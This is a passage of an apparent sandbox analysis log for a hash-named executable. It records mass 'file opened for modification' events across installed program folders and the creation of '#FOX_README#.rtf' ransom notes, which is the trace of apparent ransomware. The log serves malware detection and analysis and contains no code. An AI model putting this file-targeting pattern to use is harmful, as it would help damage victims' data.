Files\Java\jre7\lib\management-agent.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Adelaide f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Salta f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5EDT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Istanbul f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\security\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_cs.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Zurich f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\security\blacklist f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-execution.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_CN.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Qatar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-loaders.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\resources.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\manifest.json f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-core.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\rmid.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\New_York f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Winamac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guayaquil f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+3 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ko_KR.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\notification_plugin.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\RepairPing.xhtml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-api.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Colombo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-8 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Monterrey f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CST6CDT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Azores f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_fr.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-tools.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+11 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Oral f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Palau f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.policy f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.ja_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\updater.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_mac.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Mozilla Firefox\uninstall\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+12 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Bissau f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-util.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Nicosia f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Regina f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\MANIFEST.MF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Sydney f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.oracle.jmc.executable.win32.win32.x86_64_5.5.0 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_win.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Chuuk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Qyzylorda f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javafx.policy f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\epl-v10.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Brunei f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-utilities.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunec.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\MANIFEST.MF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.jasper.glassfish_2.2.2.v201205150955.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmti.h f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Honolulu f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\New_Skins.url f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\release f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-explorer.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pago_Pago f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kosrae f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\zipfs.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ext_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\UnprotectSearch.aif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belem f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\jamendo.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Danmarkshavn f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-loaders.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Vilnius f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Riga f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santiago f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\boot.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\3RDPARTY f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification 